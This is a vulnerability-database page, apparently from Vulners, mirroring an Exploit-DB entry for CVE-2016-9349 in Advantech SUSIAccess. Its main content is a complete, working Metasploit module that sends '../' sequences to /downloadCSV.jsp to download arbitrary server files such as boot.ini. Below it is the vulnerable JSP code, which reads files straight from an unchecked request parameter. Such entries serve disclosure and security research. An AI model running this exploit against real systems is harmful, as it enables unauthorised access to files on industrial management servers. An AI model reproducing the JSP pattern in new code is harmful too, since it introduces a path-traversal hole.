Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)

🗓️ 01 Aug 2017 00:00:00Reported by James FittsType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 69 Views

Advantech SUSIAccess <= 3.0 Information Disclosure vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Advantech SUSIAccess <= 3.0 - RecoveryMgmt File Upload Exploit
1 Aug 201700:00
zdt
0day.today		Advantech SUSIAccess <= 3.0 - Directory Traversal / Information Disclosure Exploit
1 Aug 201700:00
zdt
CNVD		Advantech SUSIAccess Server Information Disclosure Vulnerability
3 Dec 201600:00
cnvd
CVE		CVE-2016-9349
13 Feb 201721:00
cve
Cvelist		CVE-2016-9349
13 Feb 201721:00
cvelist
Exploit DB		Advantech SUSIAccess &lt; 3.0 - &#039;RecoveryMgmt&#039; File Upload
1 Aug 201700:00
exploitdb
exploitpack		Advantech SUSIAccess 3.0 - RecoveryMgmt File Upload
1 Aug 201700:00
exploitpack
exploitpack		Advantech SUSIAccess 3.0 - Directory Traversal Information Disclosure (Metasploit)
1 Aug 201700:00
exploitpack
ICS		Advantech SUSIAccess Server Vulnerabilities
4 Sep 201606:00
ics
NVD		CVE-2016-9349
13 Feb 201721:59
nvd
Rows per page
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Advantech SUSIAccess Server Directory Traversal Information Disclosure',
			'Description'    => %q{
				This module exploits an information disclosure vulnerability found in
				Advantech SUSIAccess <= version 3.0. The vulnerability is triggered when
				sending a GET request to the server with a series of dot dot slashes (../)
				in the file parameter. 
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2016-9349' ],
					[ 'ZDI', '16-628' ],
					[ 'BID', '94629' ],
					[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04' ]
				],
			'DisclosureDate' => 'Dec 13 2016'))

		register_options(
			[
				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
				Opt::RPORT(8080)
			], self.class )
	end

	def run

	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
	levels = "/" + ("../" * depth)

	file = "#{levels}#{datastore['FILE']}"
	file = file.gsub(/ /, "%20")

	res = send_request_raw({
		'method'	=> 'GET',
		'uri'		=> "/downloadCSV.jsp?file=#{file}",
	})

	if res and res.code == 200
		loot = res.body
		if not loot or loot.empty?
			print_status("File from #{rhost}:#{rport} is empty...")
			return
		end
		file = ::File.basename(datastore['FILE'])
		path = store_loot('advantech_susiaccess.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
		print_status("Stored #{datastore['FILE']} to #{path}")
		return
	else
		print_error("Something went wrong... Application returned a #{res.code}")
	end

	end
end
__END__
<%@ page import="java.util.*,java.io.*" %>               
<%
 File f = new File (getServletContext().getRealPath("/") + request.getParameter("file") );
 //set the content type(can be excel/word/powerpoint etc..)
 response.setContentType ("application/csv");
 //set the header and also the Name by which user will be prompted to save
 response.setHeader ("Content-Disposition", "attachment; filename=\""+request.getParameter("file").split("/")[2] +"\"");
 
 //get the file name
 String name = f.getName().substring(f.getName().lastIndexOf("/") + 1,f.getName().length());
 //OPen an input stream to the file and post the file contents thru the 
 //servlet output stream to the client m/c
 
  InputStream in = new FileInputStream(f);
  ServletOutputStream outs = response.getOutputStream();
  
  
  int bit = 256;
  int i = 0;
  try {
   while ((bit) >= 0) {
    bit = in.read();
    outs.write(bit);
   }
   //System.out.println("" +bit);
  } catch (IOException ioe) {
   ioe.printStackTrace(System.out);
  }
//  System.out.println( "n" + i + " bytes sent.");
//  System.out.println( "n" + f.length() + " bytes sent.");
  outs.flush();
  outs.close();
  in.close(); 

%>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Aug 2017 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
CVSS 37.5
EPSS0.23687
advantech susiaccessdirectory traversalinformation disclosuremetasploitremote exploithttpclient
69